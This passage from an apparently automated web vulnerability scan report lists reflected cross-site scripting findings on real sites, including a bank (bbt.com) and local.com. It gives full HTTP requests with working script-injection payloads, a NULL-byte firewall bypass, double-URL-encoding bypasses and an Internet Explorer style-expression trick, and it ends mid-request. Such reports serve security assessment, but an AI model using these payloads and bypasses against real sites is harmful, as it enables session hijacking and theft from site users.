1.447. http://www.bbt.com/bbt/personal/products/checkcard/default.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /bbt/personal/products/checkcard/default.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0055e59"><script>alert(1)</script>759ab4bcd91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 55e59"><script>alert(1)</script>759ab4bcd91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/personal/products/checkcard/default.html?%0055e59"><script>alert(1)</script>759ab4bcd91=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:33 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 31030
cache-control: private
x-powered-by: ASP.NET


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   
...[SNIP]...
<a href="/bbt/personal/products/checkcard/default.html?page=print&%0055e59"><script>alert(1)</script>759ab4bcd91=1" onclick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

1.448. http://www.bbt.com/bbt/personal/products/onlinebanking/default.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /bbt/personal/products/onlinebanking/default.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006f039"><script>alert(1)</script>d7e45a2b9d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f039"><script>alert(1)</script>d7e45a2b9d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/personal/products/onlinebanking/default.html?%006f039"><script>alert(1)</script>d7e45a2b9d5=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:39 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 35938
cache-control: private
x-powered-by: ASP.NET


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   
   
               
...[SNIP]...
<a href="/bbt/personal/products/onlinebanking/default.html?page=print&%006f039"><script>alert(1)</script>d7e45a2b9d5=1" onclick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

1.449. http://www.bbt.com/bbt/sitemap.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /bbt/sitemap.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009f75f"><script>alert(1)</script>ddf7c1767f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f75f"><script>alert(1)</script>ddf7c1767f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/sitemap.html?%009f75f"><script>alert(1)</script>ddf7c1767f3=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:11:59 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 32253
cache-control: private
x-powered-by: ASP.NET


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   
   
...[SNIP]...
<a href="/bbt/sitemap.html?page=print&%009f75f"><script>alert(1)</script>ddf7c1767f3=1" onclick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

1.450. https://www.bbt.com/images/chat/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.bbt.com
Path:   /images/chat/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a1daf"><script>alert(1)</script>1641a099e6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a1daf"><script>alert(1)</script>1641a099e6e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /images/chat/?%00a1daf"><script>alert(1)</script>1641a099e6e=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:33 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 207
cache-control: private
x-powered-by: ASP.NET
Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)


               <html><head><meta http-equiv="refresh" content="0;url=http://www.bbt.com/errors/403-14.asp?403;http://172.30.10.46:80/images/chat/?%00a1daf"><script>alert(1)</script>1641a099e6e=1"></head></html
...[SNIP]...

1.451. https://www.bbt.com/images/chat/oao-matrix/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.bbt.com
Path:   /images/chat/oao-matrix/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00de7c6"><script>alert(1)</script>3830aed06ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as de7c6"><script>alert(1)</script>3830aed06ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /images/chat/oao-matrix/?%00de7c6"><script>alert(1)</script>3830aed06ac=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:34 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 218
cache-control: private
x-powered-by: ASP.NET
Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)


               <html><head><meta http-equiv="refresh" content="0;url=http://www.bbt.com/errors/403-14.asp?403;http://172.30.10.46:80/images/chat/oao-matrix/?%00de7c6"><script>alert(1)</script>3830aed06ac=1"></
...[SNIP]...

1.452. https://www.bbt.com/images/chat/oao/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.bbt.com
Path:   /images/chat/oao/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00fd8c7"><script>alert(1)</script>c4970a877ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fd8c7"><script>alert(1)</script>c4970a877ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /images/chat/oao/?%00fd8c7"><script>alert(1)</script>c4970a877ed=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:35 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 211
cache-control: private
x-powered-by: ASP.NET
Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)


               <html><head><meta http-equiv="refresh" content="0;url=http://www.bbt.com/errors/403-14.asp?403;http://172.30.10.46:80/images/chat/oao/?%00fd8c7"><script>alert(1)</script>c4970a877ed=1"></head></
...[SNIP]...

1.453. https://www.bbt.com/images/chat/vcsp/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.bbt.com
Path:   /images/chat/vcsp/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ae575"><script>alert(1)</script>447eca9d97b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ae575"><script>alert(1)</script>447eca9d97b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /images/chat/vcsp/?%00ae575"><script>alert(1)</script>447eca9d97b=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:39 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 212
cache-control: private
x-powered-by: ASP.NET
Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)


               <html><head><meta http-equiv="refresh" content="0;url=http://www.bbt.com/errors/403-14.asp?403;http://172.30.10.46:80/images/chat/vcsp/?%00ae575"><script>alert(1)</script>447eca9d97b=1"></head><
...[SNIP]...

1.454. http://www.brothercake.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.brothercake.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 350fe"><script>alert(1)</script>79cd7322848 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 350fe\"><script>alert(1)</script>79cd7322848 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?350fe"><script>alert(1)</script>79cd7322848=1 HTTP/1.1
Host: www.brothercake.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:22:32 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Cache-control: private
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: PHPSESSID=3f722a0b27bbf1e02a7a38b563ec2988; path=/
Connection: close
Content-Type: text/html
Content-Length: 20228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta http
...[SNIP]...
<form id="stylesForm" action="/?350fe\"><script>alert(1)</script>79cd7322848=1" method="post">
...[SNIP]...

1.455. http://www.local.com/dart/ [cat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the cat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 629be%2527%253balert%25281%2529%252f%252f3d8ca4cb923 was submitted in the cat parameter. This input was echoed as 629be';alert(1)//3d8ca4cb923 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the cat request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services629be%2527%253balert%25281%2529%252f%252f3d8ca4cb923&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 1062
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:25:15 GMT
Connection: close
Content-Length: 1062


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=1;tile=1;cat=financial_services629be';alert(1)//3d8ca4cb923;city=dallas_tx;sz=728x90;ord=1296748812638?" type="text/javascript">
...[SNIP]...

1.456. http://www.local.com/dart/ [cat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14aca%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee268f1e14c1 was submitted in the cat parameter. This input was echoed as 14aca"><script>alert(1)</script>e268f1e14c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the cat request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services14aca%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee268f1e14c1&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 1107
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:25:15 GMT
Connection: close
Content-Length: 1107


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=1;tile=1;cat=financial_services14aca"><script>alert(1)</script>e268f1e14c1;city=dallas_tx;sz=728x90;ord=1296748812638?" target="_blank">
...[SNIP]...

1.457. http://www.local.com/dart/ [css parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the css request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36ffb"style%3d"x%3aexpression(alert(1))"4094d82a023 was submitted in the css parameter. This input was echoed as 36ffb"style="x:expression(alert(1))"4094d82a023 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&css=banner36ffb"style%3d"x%3aexpression(alert(1))"4094d82a023&p=locm.pp&pos=1&t=1&sz=728x90&ord=1296748883062&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 890
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:29 GMT
Connection: close
Content-Length: 890


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<body class="banner36ffb"style="x:expression(alert(1))"4094d82a023">
...[SNIP]...

1.458. http://www.local.com/dart/ [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9cd27'%3b570d9e9b527 was submitted in the l parameter. This input was echoed as 9cd27';570d9e9b527 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300&ord=1296748882748&k=banks&l=Dallas%2c+TX9cd27'%3b570d9e9b527 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
